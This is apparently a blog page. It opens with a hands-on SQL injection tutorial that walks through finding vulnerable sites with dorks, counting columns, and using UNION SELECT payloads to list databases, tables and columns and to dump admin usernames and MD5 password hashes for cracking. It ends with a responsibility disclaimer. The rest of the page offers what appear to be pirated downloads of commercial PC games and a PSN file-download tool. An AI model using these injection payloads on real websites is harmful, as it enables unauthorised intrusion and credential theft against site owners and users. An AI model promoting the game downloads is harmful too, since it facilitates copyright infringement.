SQL Injection Manual (Basic Tutorial)


Today, I will show you how SQLi can be easy!
This is only a basic tutorial.

Introduction:

This is very simple, just use these dorks with a SQLi scanner, or Google them check every site by yourself:
http://pastebin.com/vAZqkzMx

Now check each site manually to see if it is vulnerable, just add ' at the end of the url:

For example, we have our target,
Code:
http://www.example.net/news_details.php?id=30

Now, we want to check and see if this is SQLi is vulnerable, so we add ' at the end:
Code:
http://www.example.net/news_details.php?id=30'

If we got an error, that means that the site is vulnerable!


So, now we move on to the next step.

How To Find Columns Count:

After you have your vulnerable site, you need to know its column count, to do this, just add "order by X--" at the end of the URL,
X is a number from 1 to unlimited.

For example, we have our target server and we try to count columns,
we add order by 1-- at the end , then order by 2--, etc. Always increase by a number until you get an error on the website like thise one:


So, in our target server, we have tried this:
Code:
http://www.example.net/news_details.php?id=30 order by 1-- >> no error
http://www.example.net/news_details.php?id=30 order by 2-- >> no error
http://www.example.net/news_details.php?id=30 order by 3-- >> no error
http://www.example.net/news_details.php?id=30 order by 4-- >> no error
http://www.example.net/news_details.php?id=30 order by 5-- >> no error
http://www.example.net/news_details.php?id=30 order by 6-- >> no error
http://www.example.net/news_details.php?id=30 order by 7-- >> no error
http://www.example.net/news_details.php?id=30 order by 8-- >> Unknown column

http://www.example.net/news_details.php?id=30 order by 8-- >> Unknown column
That means that the 8th column does not exist, that means that the column count is 7!

How to Find The Accessible Columns:

Now, we know that the column count is 7, the next step is to check for accessible columns, to do that, we use this query "UNION SELECT number,of,columns--" like this:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,6,7--

You will get something like this:


That means that we can get information from the site from the 6th, the 2nd and the 3rd column!

How To Get MySQL DB Version:

We need to know the MySQL DB Version to know if we can exploit this site or not, cause every site that is using MySQL 4.x.x, is impossible to work with, but every 5.x.x or above is exploitable.
So to know MySQL DB Version, just replace the number of the used column with "@@version"

For example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--



That means that we can continue working on this site.

How To Find Database Name:

Now , we are going to inject the site to find the DB Name,
to do this, replace the used column number with "group_concat(schema_name)", and add "from information_schema.schemata--" after the last column number, for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--


Now, to use the one the website uses, replace "group_concat(schema_name)" with "concat(database())" for example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--


Congrats, you got the used DB!

How to Get The Table Names:

Now we need to get table names, to do this, replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number.

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--


How To Get Column Names:

To get column names, we will use this query:
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example:
Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--


How To Get Information From Columns:

Now, we are in our final step, now we will get the admin info from column, how to do it?
Simple, follow this example:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this:

Code:
http://www.example.net/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from example_gh.coc_admin--



Now we need to decrypt the password that is encrypted in md5,
go to http://www.md5decrypter.co.uk/ paste your hash, fill in the captcha and click on decrypt, with a little luck, you will get the password like here:


We have succelfully injected a website, and got the admin info! Thank you for reading my tutorial!

I am not responsible for your actions .

0 comments:

Sleeping Dogs

STORY TRAILER



Minimum Requirements

  • Microsft Windows Vista ® / Windows 7: OS
  • CPU: 2.4GHz or Intel ® Core2Duo 2.0GHz AthlonX2
  • more than 2GB: Main Memory
  • DirectX ® 10/11: graphics board or more ATI Radeon 3870 or AMD ATI card NVIDIA ® GeForce8800GT or NVIDIA ® more than 320MB: graphics memory
  • 10GB: HDD capacity disk drive 

Download the game by !PRESSING! the picture below.



0 comments:

Devil May Cry 5

!TRAILER!



GAMEPLAY



THE GAME:
 The game is set in a parallel universe in the Devil May Cry series. The story tells of a younger Dante and his journey through the fictitious Limbo City, a city that appears calm at first, but transforms into a twisted parody of itself with demons who frequently attempt to kill Dante. Dante will also be fighting against the city’s ever changing environment as well.



Minimum System Requirements:







  • OS: Windows Vista/XP, Windows 7, Windows 8
    • 

  • Processor: AMD Athlon™ X2 2.8 Ghz or better,
    • 

  • Intel Core™2 Duo 2.4 Ghz or better
    • 

  • Memory: 2 GB RAM
    • 

  • Hard Disk Space: 8 GB free hard drive space
    • 

  • Video Card: ATI Radeon™ HD 3850 or better,
    • 

  • NVIDIA GeForce® 8800GTS or better
    • 

  • DirectX: 9.0c or greater
    • 

  • Sound: Standard audio device
    • 

    

    Download the game by pressing the picture !BELOW!
    

    How to install the game !VIDEO!



    0 comments:

    Mass Effect 3

    !TRAILER!


    GAMEPLAY

    Minimum System Requirements

    • OS: Windows XP SP3/Vista SP1, Win 7
    • CPU: 1.8 GHz Intel Core 2 Duo or equivalent
    • RAM: 1GB for XP / 2GB RAM for Vista/Win 7
    • Disc Drive: 1x speed
    • Hard Drive: 15 GB of free space
    • Video: 256 MB* (with Pixel Shader 3.0 support)
    • Sound: DirectX 9.0c compatible
    • DirectX: DirectX 9.0c 
    YOU CAN ALSO SEE IF YOUR PC CAN PLAY THE GAME FROM HERE-->

                          IS YOUR PC READY FOR MASS EFFECT 3?  



    Download the game by pressing the picture !BELOW!






    0 comments:

    PSNStuff V1.2



    A very useful tool the PSNStuff V1.2  has just came out that gives you the possibility to download from the PSN  files ! You just choose which file you want to download from the list and you press download ! The result is that you download a pkg file which you can install it with install package files and enable it with ReactPSN. The tool is completely free and you can try downlaod it from the link below !

    Download  PSNStuff V1.2 from --> HERE


    0 comments:

    StarCraft II : Wings of Liberty

    !Launch Trailer!


    !Gameplay TRAILER!


    Download the game by pressing the picture below !



    0 comments:

    Warhammer 40K : Space Marine

    Stop painting and play !!!!

    !TRAILER!


    Plot : 
    In Warhammer 40,000: Space Marine, you play as Captain Titus of the Ultramarines, who is humanity's last hope for survival in a war-ridden future. Step into the armor of this superhuman hero and use a lethal combination of deadly weapons to stop the overwhelming savage Ork horde and the unholy forces of Chaos in order to save the vital Forge World. Become the ultimate defender of humanity as a mighty Space Marine. It's up to you and your battle-hardened squad of Space Marines to cut a bloody path through the horde and discover what they are after. Relic Entertainment will bring the epic Warhammer 40,000 universe to life in this dark and compelling action role-playing game. 

    Minimum Configuration 
    *   OS - Windows XP SP3, Windows Vista SP1, Windows 7
    *   Processor - 2.0Ghz Dual core CPU (any Core 2 Duo or AMD X2 or better)
    *   RAM - 1GB (XP), 2GB (Vista), 2GB (Windows 7)
    *   Hard Drive - 20 GB space free (10 GB free after install)
    *   Video Card - 256MB Video Card using Shader Model 3 & DirectX 9.0 or better (Performance equivalent to an AMD Radeon 3850 or NVIDIA GeForce 8800GT)
    *   Online Steam account




    DOWNLOAD THE GAME BY PRESSING THE !PICTURE! BELOW ! 





    1 comments:

    Call Of Duty : Modern Warfare 3

    READ THE PLOT -->http://adf.ly/H4BfX <-- this link will redirect you to wikipedia!
    !TRAILER!



     YOU CAN DOWNLOAD THE GAME BY !PRESSING! THE PICTURE BELOW

    0 comments:

    Bad Piggies

    Now you can download this game for free from HERE !
    (PC edition) 
    !TRAILER!



     YOU CAN DOWNLOAD THE GAME BY !PRESSING! THE PICTURE BELOW

    1 comments:

    Prototype 2

    !TRAILER!



     YOU CAN DOWNLOAD THE GAME BY !PRESSING! THE PICTURE BELOW


    0 comments:

    Subscribe to: Posts (Atom)
    Leave a comment if you like the post !